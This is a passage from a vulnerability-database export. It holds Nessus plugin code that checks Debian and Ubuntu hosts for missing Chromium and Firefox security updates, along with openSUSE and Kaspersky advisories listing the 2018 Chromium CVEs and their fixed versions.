DSA-4237-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2018-6118\n Ned Williamson discovered a use-after-free issue.\n\n - CVE-2018-6120\n Zhou Aiting discovered a buffer overflow issue in the\n pdfium library.\n\n - CVE-2018-6121\n It was discovered that malicious extensions could\n escalate privileges.\n\n - CVE-2018-6122\n A type confusion issue was discovered in the v8\n JavaScript library.\n\n - CVE-2018-6123\n Looben Yang discovered a use-after-free issue.\n\n - CVE-2018-6124\n Guang Gong discovered a type confusion issue.\n\n - CVE-2018-6125\n Yubico discovered that the WebUSB implementation was too\n permissive.\n\n - CVE-2018-6126\n Ivan Fratric discovered a buffer overflow issue in the\n skia library.\n\n - CVE-2018-6127\n Looben Yang discovered a use-after-free issue.\n\n - CVE-2018-6129\n Natalie Silvanovich discovered an out-of-bounds read\n issue in WebRTC.\n\n - CVE-2018-6130\n Natalie Silvanovich discovered an out-of-bounds read\n issue in WebRTC.\n\n - CVE-2018-6131\n Natalie Silvanovich discovered an error in WebAssembly.\n\n - CVE-2018-6132\n Ronald E. Crane discovered an uninitialized memory\n issue.\n\n - CVE-2018-6133\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-6134\n Jun Kokatsu discovered a way to bypass the Referrer\n Policy.\n\n - CVE-2018-6135\n Jasper Rebane discovered a user interface spoofing\n issue.\n\n - CVE-2018-6136\n Peter Wong discovered an out-of-bounds read issue in the\n v8 JavaScript library.\n\n - CVE-2018-6137\n Michael Smith discovered an information leak.\n\n - CVE-2018-6138\n Francois Lajeunesse-Robert discovered that the\n extensions policy was too permissive.\n\n - CVE-2018-6139\n Rob Wu discovered a way to bypass restrictions in the\n debugger extension.\n\n - CVE-2018-6140\n Rob Wu discovered a way to bypass restrictions in the\n debugger extension.\n\n - CVE-2018-6141\n Yangkang discovered a buffer overflow issue in the skia\n library.\n\n - CVE-2018-6142\n Choongwoo Han discovered an out-of-bounds read in the v8\n JavaScript library.\n\n - CVE-2018-6143\n Guang Gong discovered an out-of-bounds read in the v8\n JavaScript library.\n\n - CVE-2018-6144\n pdknsk discovered an out-of-bounds read in the pdfium\n library.\n\n - CVE-2018-6145\n Masato Kinugawa discovered an error in the MathML\n implementation.\n\n - CVE-2018-6147\n Michail Pishchagin discovered an error in password entry\n fields.\n\n - CVE-2018-6148\n Michal Bentkowski discovered that the Content Security\n Policy header was handled incorrectly.\n\n - CVE-2018-6149\n Yu Zhou and Jundong Xie discovered an out-of-bounds\n write issue in the v8 JavaScript library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6139\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6148\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-6149\"\n );\n # https://security-tracker.debian.org/tracker/source-package/chromium-browser\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e33901a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4237\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 67.0.3396.87-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"67.0.3396.87-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:26", "bulletinFamily": "scanner", "description": "A heap buffer overflow was discovered in Skia. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service, or execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-16T00:00:00", "id": "UBUNTU_USN-3682-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110517", "published": "2018-06-13T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : firefox vulnerability (USN-3682-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3682-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110517);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/16 9:47:22\");\n\n script_cve_id(\"CVE-2018-6126\");\n script_xref(name:\"USN\", value:\"3682-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : firefox vulnerability (USN-3682-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap buffer overflow was discovered in Skia. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service, or execute\narbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3682-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(14\\.04|16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"firefox\", pkgver:\"60.0.2+build1-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"firefox\", pkgver:\"60.0.2+build1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"firefox\", pkgver:\"60.0.2+build1-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"firefox\", pkgver:\"60.0.2+build1-0ubuntu0.18.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2018-06-01T04:36:29", "bulletinFamily": "unix", "description": "This update for chromium to version 66.0.3359.181 fixes the following\n issues:\n\n The following security issues were fixed (boo#1095163):\n\n * CVE-2018-6123: Use after free in Blink.\n * CVE-2018-6124: Type confusion in Blink.\n * CVE-2018-6125: Overly permissive policy in WebUSB.\n * CVE-2018-6126: Heap buffer overflow in Skia.\n * CVE-2018-6127: Use after free in indexedDB.\n * CVE-2018-6128: uXSS in Chrome on iOS.\n * CVE-2018-6129: Out of bounds memory access in WebRTC.\n * CVE-2018-6130: Out of bounds memory access in WebRTC.\n * CVE-2018-6131: Incorrect mutability protection in WebAssembly.\n * CVE-2018-6132: Use of uninitialized memory in WebRTC.\n * CVE-2018-6133: URL spoof in Omnibox.\n * CVE-2018-6134: Referrer Policy bypass in Blink.\n * CVE-2018-6135: UI spoofing in Blink.\n * CVE-2018-6136: Out of bounds memory access in V8.\n * CVE-2018-6137: Leak of visited status of page in Blink.\n * CVE-2018-6138: Overly permissive policy in Extensions.\n * CVE-2018-6139: Restrictions bypass in the debugger extension API.\n * CVE-2018-6140: Restrictions bypass in the debugger extension API.\n * CVE-2018-6141: Heap buffer overflow in Skia.\n * CVE-2018-6142: Out of bounds memory access in V8.\n * CVE-2018-6143: Out of bounds memory access in V8.\n * CVE-2018-6144: Out of bounds memory access in PDFium.\n * CVE-2018-6145: Incorrect escaping of MathML in Blink.\n * CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views.\n\n Additional changes:\n\n * Autoplay: Force enable on desktop for Web Audio\n\n This update enables the &quot;Strict site isolation&quot; feature for a larger\n percentage of users. This feature is a mitigation against the Spectre\n vulnerabilities. It can be turned on via:\n chrome://flags/#enable-site-per-process It can be disabled via:\n chrome://flags/#site-isolation-trial-opt-out\n\n", "modified": "2018-06-01T03:07:21", "published": "2018-06-01T03:07:21", "id": "OPENSUSE-SU-2018:1485-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00001.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-06-01T04:36:29", "bulletinFamily": "unix", "description": "This update for chromium to version 66.0.3359.181 fixes the following\n issues:\n\n The following security issues were fixed (boo#1095163):\n\n * CVE-2018-6123: Use after free in Blink.\n * CVE-2018-6124: Type confusion in Blink.\n * CVE-2018-6125: Overly permissive policy in WebUSB.\n * CVE-2018-6126: Heap buffer overflow in Skia.\n * CVE-2018-6127: Use after free in indexedDB.\n * CVE-2018-6128: uXSS in Chrome on iOS.\n * CVE-2018-6129: Out of bounds memory access in WebRTC.\n * CVE-2018-6130: Out of bounds memory access in WebRTC.\n * CVE-2018-6131: Incorrect mutability protection in WebAssembly.\n * CVE-2018-6132: Use of uninitialized memory in WebRTC.\n * CVE-2018-6133: URL spoof in Omnibox.\n * CVE-2018-6134: Referrer Policy bypass in Blink.\n * CVE-2018-6135: UI spoofing in Blink.\n * CVE-2018-6136: Out of bounds memory access in V8.\n * CVE-2018-6137: Leak of visited status of page in Blink.\n * CVE-2018-6138: Overly permissive policy in Extensions.\n * CVE-2018-6139: Restrictions bypass in the debugger extension API.\n * CVE-2018-6140: Restrictions bypass in the debugger extension API.\n * CVE-2018-6141: Heap buffer overflow in Skia.\n * CVE-2018-6142: Out of bounds memory access in V8.\n * CVE-2018-6143: Out of bounds memory access in V8.\n * CVE-2018-6144: Out of bounds memory access in PDFium.\n * CVE-2018-6145: Incorrect escaping of MathML in Blink.\n * CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views.\n\n Additional changes:\n\n * Autoplay: Force enable on desktop for Web Audio\n\n This update enables the &quot;Strict site isolation&quot; feature for a larger\n percentage of users. This feature is a mitigation against the Spectre\n vulnerabilities. It can be turned on via:\n chrome://flags/#enable-site-per-process It can be disabled via:\n chrome://flags/#site-isolation-trial-opt-out\n\n", "modified": "2018-06-01T03:06:56", "published": "2018-06-01T03:06:56", "id": "OPENSUSE-SU-2018:1484-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00000.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T17:46:30", "bulletinFamily": "unix", "description": "This update for Chromium to version 67.0.3396.99 fixes multiple issues.\n\n Security issues fixed (bsc#1095163):\n\n - CVE-2018-6123: Use after free in Blink\n - CVE-2018-6124: Type confusion in Blink\n - CVE-2018-6125: Overly permissive policy in WebUSB\n - CVE-2018-6126: Heap buffer overflow in Skia\n - CVE-2018-6127: Use after free in indexedDB\n - CVE-2018-6129: Out of bounds memory access in WebRTC\n - CVE-2018-6130: Out of bounds memory access in WebRTC\n - CVE-2018-6131: Incorrect mutability protection in WebAssembly\n - CVE-2018-6132: Use of uninitialized memory in WebRTC\n - CVE-2018-6133: URL spoof in Omnibox\n - CVE-2018-6134: Referrer Policy bypass in Blink\n - CVE-2018-6135: UI spoofing in Blink\n - CVE-2018-6136: Out of bounds memory access in V8\n - CVE-2018-6137: Leak of visited status of page in Blink\n - CVE-2018-6138: Overly permissive policy in Extensions\n - CVE-2018-6139: Restrictions bypass in the debugger extension API\n - CVE-2018-6140: Restrictions bypass in the debugger extension API\n - CVE-2018-6141: Heap buffer overflow in Skia\n - CVE-2018-6142: Out of bounds memory access in V8\n - CVE-2018-6143: Out of bounds memory access in V8\n - CVE-2018-6144: Out of bounds memory access in PDFium\n - CVE-2018-6145: Incorrect escaping of MathML in Blink\n - CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views\n - CVE-2018-6148: Incorrect handling of CSP header (boo#1096508)\n - CVE-2018-6149: Out of bounds write in V8 (boo#1097452)\n\n The following tracked packaging changes are included:\n\n - Require ffmpeg &gt;= 4.0 (boo#1095545)\n\n", "modified": "2018-07-25T15:08:23", "published": "2018-07-25T15:08:23", "id": "OPENSUSE-SU-2018:2054-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00031.html", "title": "Security update for Chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T17:46:30", "bulletinFamily": "unix", "description": "This update for Chromium to version 67.0.3396.99 fixes multiple issues.\n\n Security issues fixed (bsc#1095163):\n\n - CVE-2018-6123: Use after free in Blink\n - CVE-2018-6124: Type confusion in Blink\n - CVE-2018-6125: Overly permissive policy in WebUSB\n - CVE-2018-6126: Heap buffer overflow in Skia\n - CVE-2018-6127: Use after free in indexedDB\n - CVE-2018-6129: Out of bounds memory access in WebRTC\n - CVE-2018-6130: Out of bounds memory access in WebRTC\n - CVE-2018-6131: Incorrect mutability protection in WebAssembly\n - CVE-2018-6132: Use of uninitialized memory in WebRTC\n - CVE-2018-6133: URL spoof in Omnibox\n - CVE-2018-6134: Referrer Policy bypass in Blink\n - CVE-2018-6135: UI spoofing in Blink\n - CVE-2018-6136: Out of bounds memory access in V8\n - CVE-2018-6137: Leak of visited status of page in Blink\n - CVE-2018-6138: Overly permissive policy in Extensions\n - CVE-2018-6139: Restrictions bypass in the debugger extension API\n - CVE-2018-6140: Restrictions bypass in the debugger extension API\n - CVE-2018-6141: Heap buffer overflow in Skia\n - CVE-2018-6142: Out of bounds memory access in V8\n - CVE-2018-6143: Out of bounds memory access in V8\n - CVE-2018-6144: Out of bounds memory access in PDFium\n - CVE-2018-6145: Incorrect escaping of MathML in Blink\n - CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views\n - CVE-2018-6148: Incorrect handling of CSP header (boo#1096508)\n - CVE-2018-6149: Out of bounds write in V8 (boo#1097452)\n\n The following tracked packaging changes are included:\n\n - Require ffmpeg &gt;= 4.0 (boo#1095545)\n\n", "modified": "2018-07-25T15:09:58", "published": "2018-07-25T15:09:58", "id": "OPENSUSE-SU-2018:2055-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00032.html", "title": "Security update for Chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-06-08T23:26:45", "bulletinFamily": "unix", "description": "This update for MozillaFirefox, mozilla-nss fixes the following issues:\n\n Security issue fixed in Mozilla Firefox 60.0.2 ESR:\n\n - CVE-2018-6126: Heap buffer overflow rasterizing paths in SVG with Skia\n (MFSA 2018-14, boo#1096449)\n\n The following bugs were fixed:\n\n - In KDE Open with option in download dialog has no effect with\n kmozillahelper (boo#1094747)\n - Startup crashes on aarch64 (boo#1093059)\n\n Mozilla Firefox now requires NSS 3.36.4 (boo#1096515). The following\n changes are included in NSS:\n\n - Fix issues connecting to servers recently upgraded to TLS 1.3\n (SSL_RX_MALFORMED_SERVER_HELLO error)\n - Fix a rare bug with PKCS#12 files\n - Apply additional harding (relro linker option)\n\n", "modified": "2018-06-08T21:17:31", "published": "2018-06-08T21:17:31", "id": "OPENSUSE-SU-2018:1616-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00011.html", "title": "Security update for MozillaFirefox, mozilla-nss (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:29", "bulletinFamily": "info", "description": "### *Detect date*:\n05/29/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities possibly to execute arbitrary code, cause denial of service, perform cross-site scripting attacks, obtain sensitive information, spoof user interface, bypass security restrictions and perform unspecified attacks.\n\n### *Affected products*:\nGoogle Chrome earlier than 67.0.3396.62\n\n### *Solution*:\nUpdate to latest version. \n[Download Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2018-6123](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6123>)0.0Critical \n[CVE-2018-6124](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6124>)0.0Critical \n[CVE-2018-6125](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6125>)0.0Critical \n[CVE-2018-6126](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6126>)0.0Critical \n[CVE-2018-6127](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6127>)0.0Critical \n[CVE-2018-6128](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6128>)0.0Critical \n[CVE-2018-6129](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6129>)0.0Critical \n[CVE-2018-6130](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6130>)0.0Critical \n[CVE-2018-6131](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6131>)0.0Critical \n[CVE-2018-6132](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6132>)0.0Critical \n[CVE-2018-6133](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6133>)0.0Critical \n[CVE-2018-6134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6134>)0.0Critical \n[CVE-2018-6135](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6135>)0.0Critical \n[CVE-2018-6136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6136>)0.0Critical \n[CVE-2018-6137](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6137>)0.0Critical \n[CVE-2018-6138](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6138>)0.0Critical \n[CVE-2018-6139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6139>)0.0Critical \n[CVE-2018-6140](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6140>)0.0Critical \n[CVE-2018-6141](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6141>)0.0Critical \n[CVE-2018-6142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6142>)0.0Critical \n[CVE-2018-6143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6143>)0.0Critical \n[CVE-2018-6144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6144>)0.0Critical \n[CVE-2018-6145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6145>)0.0Critical \n[CVE-2018-6147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6147>)0.0Critical", "modified": "2019-03-07T00:00:00", "published": "2018-05-29T00:00:00", "id": "KLA11257", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11257", "title": "\r KLA11257Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-21T00:14:28", "bulletinFamily": "info", "description": "### *Detect date*:\n06/08/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nA heap buffer overflow vulnerability was found in the Skia library. By exploiting this vulnerability malicious users can cause denial of service via specially crafted SVG file with anti-aliasing turned off.\n\n### *Affected products*:\nMozilla Firefox earlier than 60.0.2 \nMozilla Firefox ESR earlier than 52.8.1 \nMozilla Firefox ESR earlier than 60.0.2\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox ESR](<https://www.mozilla.org/en-US/firefox/organizations/all/>) \n[Download Mozilla Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[Mozilla Foundation Security Advisory 2018-14](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-14/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2018-6126](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6126>)0.0Critical", "modified": "2019-03-07T00:00:00", "published": "2018-06-08T00:00:00", "id": "KLA11259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11259", "title": "\r KLA11259DoS vulnerability in Mozilla Firefox and Firefox ESR ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": 